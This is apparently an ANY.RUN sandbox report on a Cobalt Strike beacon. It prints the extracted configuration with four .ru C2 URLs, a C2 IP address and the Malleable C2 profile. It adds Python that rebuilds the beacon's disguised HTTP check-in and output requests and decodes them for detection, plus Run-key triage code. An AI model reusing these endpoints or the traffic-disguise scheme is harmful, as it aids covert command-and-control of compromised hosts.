File name:

17c330ef7cdad8cf468bb43ff5b42a06.exe

Full analysis: https://app.any.run/tasks/41e21c8b-83c3-4f93-b251-49aadbcd3f45
Verdict: Malicious activity
Threats:

Cobalt Strike is a legitimate penetration-testing toolkit developed by Fortra. Cracked versions are widely adopted by threat actors, who use it as their C2 framework of choice for targeted attacks.

Analysis date: May 25, 2025, 15:33:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
golang
cobaltstrike
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5: 17C330EF7CDAD8CF468BB43FF5B42A06
SHA1: 2AD255DC761A893C7CD4DA314B927C70644469D7
SHA256: EBB245269E645416C263F5E4F3397F09E50E9ED517D9946DF38F88F72F3AE0F9
SSDEEP: 49152:dcxK8SUq4wKmVtFXpx2NgvEzCFwh08jAC000VpgZBWupaFQNOFGGqI:z4e75pwSFJdC000GxB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • COBALTSTRIKE has been detected (YARA)

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Checks supported languages

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • Reads the computer name

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • Reads the machine GUID from the registry

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • Auto-launch of the file from Registry key

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • Reads the software policy settings

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
      • slui.exe (PID: 2136)
    • Manual execution by a user

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
    • Application based on Golang

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

CobaltStrike

(PID) Process (5408): 17c330ef7cdad8cf468bb43ff5b42a06.exe
C2 (4):
  roscocmos.ru/static/images/header_autumnshade12.jpg
  tvoye-wear.ru/static/images/header_autumnshade12.jpg
  whatsqpp.ru/svc/media/v5/collection/upload_twilight23.jpg
  wldberies.ru/static/images/header_autumnshade12.jpg
BeaconType: HTTPS
Port: 443
SleepTime: 8800
MaxGetSize: 2796303
Jitter: 40
PublicKey:
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4+TIAHV7jGEGKpychAPoE4bir
ljeSw7XTDy2kbgAznLsnZqHS4eQeKR1AYETfYNld4tc+LwT08Zl5ei4VRYRjWYPy
eNXfvp1sdaoBcdMyrQ5Ub+Ka08huquLOCPjMTpSlRkuYD+4lVBfHC8J54FkO5Tn4
dMRzhbDiOvlTA2xGMwIDAQAB
-----END PUBLIC KEY-----
DNS_strategy: failover
DNS_strategy_rotate_seconds: -1
DNS_strategy_fail_x: -4294967291
DNS_strategy_fail_seconds: -1
SpawnTo: 00000000000000000000000000000000
Spawnto_x86: %windir%\syswow64\rundll32.exe
Spawnto_x64: %windir%\sysnative\rundll32.exe
CryptoScheme: 0
HttpGet_Verb: GET
HttpPost_Verb: POST
HttpPostChunk: 0
Watermark: 987654321
bStageCleanup: True
bCFGCaution: False
UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36
HttpPostUri: /api/v5/auth/session/requestaccess
Malleable_C2_Instructions: Remove 12 bytes from the beginning (repeated 8 times), XOR mask w/ ...
HttpGet_Metadata:
  ConstHeaders (3):
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate
  SessionId (4):
    base64url
    prepend: session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; tracking_code=trk.4.923874501.1713974932; access_key=a9d3cefa84e642b0a7d1f934c2b58eab; last_active=1713974932; display_name=
    append: ;
    header: Cookie
HttpPost_Metadata:
  ConstHeaders (7):
    Accept: */*
    Content-Type: application/json
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
  SessionId (4):
    base64url
    prepend: access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle=
    append: ;
    header: Cookie
  Output (5):
    mask
    base64url
    prepend: {"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"
    append: "}
    print
bUsesCookies: 0001
Proxy_Behavior: Use IE settings
tcpFrameHeader: 000a6c6f6c6b656b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader: 0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate: 0-0-0
bProcInject_StartRWX: False
bProcInject_UseRWX: False
bProcInject_MinAllocSize: 19823
ProcInject_PrependAppend_x86: 0f1f000f1f440000660f1f4400000f1f80000000000f1f840000000000..
ProcInject_PrependAppend_x64: 4d0f1f840000000000480f1f800000000066900f1f4000909090909090909090..
ProcInject_Stub: ae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethod: NtMapViewOfSection
(PID) Process (5344): 17c330ef7cdad8cf468bb43ff5b42a06.exe
Configuration identical to the one extracted from PID 5408 above (same four C2 hosts, public key, watermark 987654321 and Malleable C2 profile).
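The profile above is what makes this beacon's traffic look like a browser fetching a JPEG and posting JSON: the check-in metadata is base64url-encoded and hidden in a fixed-prefix Cookie header, and task output is XOR-masked, base64url-encoded and wrapped in a JSON "payload" field. The following added example (written for this report; it is not ANY.RUN's or Cobalt Strike's code) rebuilds the GET and POST transactions from the extracted values and then runs the inverse, i.e. the matching and decoding a detection engineer with decrypted traffic would apply. The profile strings are copied from the configuration above; the metadata bytes, beacon id, task output and 4-byte XOR key are constructed inputs. Two details are assumptions rather than report facts: that the base64url transform strips '=' padding, and that the mask transform prepends its 4-byte key to the XORed data. It also decodes the tcpFrameHeader value, whose first payload bytes are the ASCII string "lolkek" (the 2-byte length prefix is an assumed layout).

```python
"""Rebuild this beacon's HTTP transactions from its extracted Malleable C2 profile.

Added example for this report, not ANY.RUN or Cobalt Strike code. Profile
strings are copied from the configuration above; metadata, beacon id, task
output and the XOR key are constructed inputs. Assumed, not from the report:
base64url output carries no '=' padding, and 'mask' prepends its 4-byte key.
"""
import base64
import re
import struct
from typing import Optional, Tuple

C2 = [("roscocmos.ru", "/static/images/header_autumnshade12.jpg"),
      ("tvoye-wear.ru", "/static/images/header_autumnshade12.jpg"),
      ("whatsqpp.ru", "/svc/media/v5/collection/upload_twilight23.jpg"),
      ("wldberies.ru", "/static/images/header_autumnshade12.jpg")]
USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36")
GET_HEADERS = ["Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8",
               "Accept-Language: en-US,en;q=0.9", "Accept-Encoding: gzip, deflate"]
GET_COOKIE_PREPEND = ("session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; "
                      "tracking_code=trk.4.923874501.1713974932; "
                      "access_key=a9d3cefa84e642b0a7d1f934c2b58eab; "
                      "last_active=1713974932; display_name=")
POST_URI = "/api/v5/auth/session/requestaccess"
POST_HEADERS = ["Accept: */*", "Content-Type: application/json",
                "Accept-Encoding: gzip, deflate", "Accept-Language: en-US,en;q=0.9",
                "Sec-Fetch-Site: same-origin", "Sec-Fetch-Mode: cors", "Sec-Fetch-Dest: empty"]
POST_COOKIE_PREPEND = "access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle="
POST_BODY_PREPEND = '{"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"'
POST_BODY_APPEND = '"}'
SLEEP_MS, JITTER_PCT = 8800, 40
TCP_FRAME_HEADER_HEX = "000a6c6f6c6b656b" + "00" * 8   # leading bytes of the value above


def b64url(data: bytes) -> str:
    """base64url transform (assumed: URL-safe alphabet, '=' padding stripped)."""
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def xor4(data: bytes, key: bytes) -> bytes:
    """Repeating 4-byte XOR, the core of the 'mask' transform."""
    return bytes(b ^ key[i % 4] for i, b in enumerate(data))


def build_get_request(host: str, uri: str, metadata: bytes) -> str:
    """Check-in as the beacon sends it: metadata -> base64url -> Cookie value."""
    cookie = GET_COOKIE_PREPEND + b64url(metadata) + ";"
    lines = [f"GET {uri} HTTP/1.1", f"Host: {host}", f"User-Agent: {USER_AGENT}",
             *GET_HEADERS, f"Cookie: {cookie}"]
    return "\r\n".join(lines) + "\r\n\r\n"


def build_post_request(host: str, beacon_id: bytes, output: bytes, key: bytes) -> str:
    """Task output as the beacon posts it: mask (key + XOR) -> base64url -> JSON wrapper."""
    body = POST_BODY_PREPEND + b64url(key + xor4(output, key)) + POST_BODY_APPEND
    cookie = POST_COOKIE_PREPEND + b64url(beacon_id) + ";"
    lines = [f"POST {POST_URI} HTTP/1.1", f"Host: {host}", f"User-Agent: {USER_AGENT}",
             *POST_HEADERS, f"Cookie: {cookie}", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Detection side: what a TLS-terminating proxy or EDR could match on.
GET_COOKIE_RE = re.compile(re.escape(GET_COOKIE_PREPEND) + r"([A-Za-z0-9_=-]+);$")


def extract_get_metadata(raw_request: str) -> Optional[bytes]:
    """Match the fixed cookie prefix and recover the encoded beacon metadata."""
    for line in raw_request.split("\r\n"):
        if line.startswith("Cookie: "):
            m = GET_COOKIE_RE.match(line[len("Cookie: "):])
            return b64url_decode(m.group(1)) if m else None
    return None


def extract_post_output(raw_request: str) -> Optional[bytes]:
    """Strip the JSON wrapper, undo base64url, then the XOR mask."""
    parts = raw_request.split("\r\n\r\n", 1)
    body = parts[1] if len(parts) == 2 else ""
    if not (body.startswith(POST_BODY_PREPEND) and body.endswith(POST_BODY_APPEND)):
        return None
    blob = b64url_decode(body[len(POST_BODY_PREPEND):-len(POST_BODY_APPEND)])
    return xor4(blob[4:], blob[:4])


def sleep_window(sleep_ms: int, jitter_pct: int) -> Tuple[int, int]:
    """Jitter only shortens the sleep, so check-ins are spaced between these bounds (ms)."""
    return sleep_ms * (100 - jitter_pct) // 100, sleep_ms   # (5280, 8800) for this profile


def parse_tcp_frame_header(hex_value: str) -> Tuple[int, bytes]:
    """Assumed layout: 2-byte big-endian length, then the header bytes."""
    raw = bytes.fromhex(hex_value)
    length = struct.unpack(">H", raw[:2])[0]
    return length, raw[2:2 + length]   # (10, b'lolkek\x00\x00\x00\x00')
```

The fixed cookie prefix (session_id=de47fa92-..., access_key=a9d3cefa...) and the JSON wrapper {"command":"loadStats",...} are constant for every beacon built from this profile, which makes them better network signatures than the four .ru hostnames; the sleep window (5.28 to 8.8 s) is what a beaconing-detection job should look for on the 443 connections to 31.177.111.46.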

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 891392
InitializedDataSize: 109568
UninitializedDataSize: -
EntryPoint: 0x6f340
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows GUI
Screenshots: available in the full report
Total processes: 134
Monitored processes: 5
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Nodes of the graph, in the order shown (flattened from the interactive view):
  • start
  • 17c330ef7cdad8cf468bb43ff5b42a06.exe #COBALTSTRIKE
  • sppextcomobj.exe (no specs)
  • slui.exe
  • 17c330ef7cdad8cf468bb43ff5b42a06.exe #COBALTSTRIKE
  • slui.exe (no specs)

Process information

PID: 2136
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 4688
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 5344
CMD: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
Path: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Modules (images):
c:\users\admin\appdata\local\temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
c:\windows\system32\ws2_32.dll
CobaltStrike configuration for PID 5344: identical to the extraction shown in the malware configuration section above.
PID: 5408
CMD: "C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe"
Path: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Modules (images):
c:\users\admin\appdata\local\temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
CobaltStrike configuration for PID 5408: identical to the extraction shown in the malware configuration section above.
PID: 6620
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
Total events: 3 454
Read events: 3 452
Write events: 2
Delete events: 0

Modification events

(PID) Process: (5408) 17c330ef7cdad8cf468bb43ff5b42a06.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: wsupdate
Value: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe

(PID) Process: (5344) 17c330ef7cdad8cf468bb43ff5b42a06.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: wsupdate
Value: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
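The only two write events in the whole run are these HKCU Run-key entries, which is the persistence the "Changes the autorun value in the registry" indicator refers to: a value named wsupdate that re-launches the sample from the user's Temp directory at logon. The following added example (written for this report, not ANY.RUN code) shows how to triage such records automatically: it parses registry write events in a labelled "Field: value" layout, recognises Run/RunOnce keys, extracts the executable from the command and flags it when it lives in a user-writable directory or when its file name is a bare 32-hex-digit hash. The first two records are the report's events; the third is a constructed benign entry for contrast. The path list, the hash-name rule and the vendor name in the benign record are assumptions of this example.

```python
"""Triage the Run-key writes recorded in the modification events above.

Added example for this report, not ANY.RUN code. It parses registry write
records in a labelled 'Field: value' layout and flags autorun values that
launch an executable from a user-writable location or whose file name is a
bare 32-hex-digit hash. The first two records are the report's events; the
third is a constructed benign entry for contrast. The path list and the
hash-name rule are heuristics of this example.
"""
import re
from typing import Dict, List

EVENTS = r"""
(PID) Process: (5408) 17c330ef7cdad8cf468bb43ff5b42a06.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: wsupdate
Value: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe

(PID) Process: (5344) 17c330ef7cdad8cf468bb43ff5b42a06.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: wsupdate
Value: C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe

(PID) Process: (1000) ExampleInstaller.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: ExampleUpdater
Value: "C:\Program Files\ExampleVendor\Updater.exe" /silent
"""

AUTORUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
                 "\\downloads\\", "\\programdata\\", "\\windows\\temp\\")
HASH_NAME_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def parse_events(text: str) -> List[Dict[str, str]]:
    """Blank-line separated records of 'Field: value' lines."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        field, _, value = line.partition(":")
        current[field.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def image_path(command: str) -> str:
    """Executable part of an autorun command: the quoted path, else up to '.exe'."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    m = re.match(r".*?\.exe", command, re.IGNORECASE)
    return m.group(0) if m else command.split(" ")[0]


def triage(record: Dict[str, str]) -> Dict[str, object]:
    """Classify one registry write; non-autorun keys are passed through unflagged."""
    result = {"pid_process": record.get("(PID) Process"), "name": record.get("Name"),
              "autorun": False, "suspicious": False, "reasons": [], "technique": None}
    if not AUTORUN_KEY_RE.search(record.get("Key", "")):
        return result
    result["autorun"], result["technique"] = True, "T1547.001"   # Registry Run Keys
    path = image_path(record.get("Value", ""))
    low = path.lower()
    if any(frag in low for frag in USER_WRITABLE):
        result["reasons"].append("image in user-writable directory: " + path)
    stem = low.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if HASH_NAME_RE.match(stem):
        result["reasons"].append("image file name is a bare 32-hex-digit hash: " + stem)
    result["suspicious"] = bool(result["reasons"])
    return result
```

Run against the three records, both sample events come back suspicious on two counts (Temp directory, hash-shaped file name) and mapped to T1547.001, while the constructed Program Files entry is recognised as an autorun but not flagged; on a live host the same check can be fed from Sysmon event ID 13 or a registry snapshot instead of the report text.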
Executable files: 0
Suspicious files: 0
Text files: 0
Unknown types: 0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 23
DNS requests: 16
Threats: 0

HTTP requests

None of the five plaintext HTTP requests belong to the sample; they are Windows certificate-revocation and OCSP lookups. The beacon itself speaks HTTPS to 31.177.111.46:443 (see Connections), so its requests do not appear here.

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
- | - | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
1228 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted
1228 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
- | - | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
5408 | 17c330ef7cdad8cf468bb43ff5b42a06.exe | 31.177.111.46:443 | roscocmos.ru | - | RU | unknown
2112 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
5344 | 17c330ef7cdad8cf468bb43ff5b42a06.exe | 31.177.111.46:443 | roscocmos.ru | - | RU | unknown

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.206
whitelisted
roscocmos.ru
  • 31.177.111.46
unknown
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.3
  • 40.126.31.69
  • 20.190.159.130
  • 40.126.31.2
  • 40.126.31.128
  • 40.126.31.71
  • 20.190.159.4
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

No threats detected
No debug info